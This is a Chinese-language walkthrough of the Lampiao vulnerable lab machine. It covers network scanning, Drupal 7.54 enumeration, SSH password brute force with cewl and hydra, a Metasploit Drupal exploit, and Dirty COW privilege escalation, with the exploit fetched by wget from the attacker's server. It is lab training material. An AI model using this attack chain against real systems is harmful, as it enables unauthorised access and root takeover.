当前位置: 首页 > news >正文

【Lampiao靶场渗透】

文章目录

一、IP地址获取

二、信息收集

三、破解SSH密码

四、漏洞利用

五、提权


一、IP地址获取

netdiscover -i eth0 
Arp-scan -l 
Nmap -sP 192.168.78.0/24

靶机地址:192.168.78.177

Kali地址:192.168.78.128

二、信息收集

nmap  -sV  -p-  192.168.78.177

开放了 22 80 1898端口,访问80 web页面

访问1898端口

发现了登录框和网站框架信息drupal 7,随便点击一下页面发现还存在其他页面内容

http://192.168.78.177:1898/?q=node/2

提示了一个音频和图片文件

http://192.168.78.177:1898/audio.m4a
http://192.168.78.177:1898/qrc.png

音频得到提示user:tiago,图片二维码提示尝试爆破

再利用dirb探测一下其他目录

Dirb http://192.168.78.177:1898

看到了robots文件,访问一下

其中changelog.txt文件可看到框架版本Drupal 7.54

三、破解SSH密码

前面提示说需要爆破,猜测是需要构造密码字典爆破ssh密码

cewl http://192.168.78.177:1898/?q=node/1 -w password.txt
hydra -l tiago -P password.txt 192.168.78.177 -s 22 ssh 

最终得到账户密码:

用户: tiago

密码: Virgulino

ssh登录一下

发现是低权限用户!需要提权!

四、漏洞利用

通过前面我们知道网站框架是drupal 7.54,搜索exploite

searchsploit  drupal 7.54

发现msf中有,进入msf进行利用

msfdb init & msfconsole
search  Drupal
Use 1
set rport 1898
set rhosts 192.168.78.177
Set rport 6666
meterpreter > shell

交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

还是低权限用户,还需要考虑提权

五、提权

Uname -a 查看内核版本

Ubuntu 14.01,查阅资料可知可用脏牛漏洞提权

找到相关版本的exp

searchsploit dirty

locate linux/local/40847.cpp 查看绝对路径

将它复制到当前目录,并创建http服务,再靶机/tmp目录下使用wget下载

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /root
python3 -m http.server 8000
wget http://192.168.78.128:8000/40847.cpp

编译运行脚本

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o yc 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o yc  gcc生成的目标文件,名字为yc
./yc  执行gcc编译可执行文件,可直接提权

su命令转到root身份,输入上面的密码:dirtyCowFun,即可提权成功


http://www.lryc.cn/news/413894.html

相关文章:

  • 使用WebSocket实现log日志流的实时展示-从轮询到通知
  • UE5 从零开始制作跟随的大鹅
  • O’Reilly
  • 优盘驱动器未格式化:数据拯救行动指南
  • 4.Handler mappings
  • 《学会 SpringMVC 系列 · 消息转换器 MessageConverters》
  • 深度学习项目 -7-使用 Python 的手写数字识别
  • MySQL —— 库,数据类型 与 表
  • Java重修笔记 第二十七天 匿名内部类
  • Nero Lens 智图 - 适用于 iOS 和 iPadOS 的专业图片处理 App
  • Nginx代理路径被吃
  • pytest-html报告修改与汉化
  • react-native从入门到实战系列教程一Swiper组件的使用及bug修复
  • springboot开发的常用注解总结-配置组件类注解
  • DataX 最新版本安装部署
  • 【架构】应用保护
  • 从核心到边界:六边形、洋葱与COLA架构的深度解析
  • 04-Fastjson反序列化漏洞
  • ABC365(A-D)未补
  • Python用png生成不同尺寸的图标
  • 1688中国站获得工厂档案信息 API
  • 定时任务框架 xxl-job
  • C/C++关键字大全
  • ROS2 Linux Mint 22 安装教程
  • 快速将网站从HTTP升级为HTTPS
  • Qt程序移植至Arm开发板
  • 删除分区 全局索引 drop partition global index Statistics变化
  • git回退未commit、回退已commit、回退已push、合并某一次commit到另一个分支
  • yolov8pose 部署rknn(rk3588)、部署地平线Horizon、部署TensorRT,部署工程难度小、模型推理速度快,DFL放后处理中
  • 程序员找工作之操作系统面试题总结分析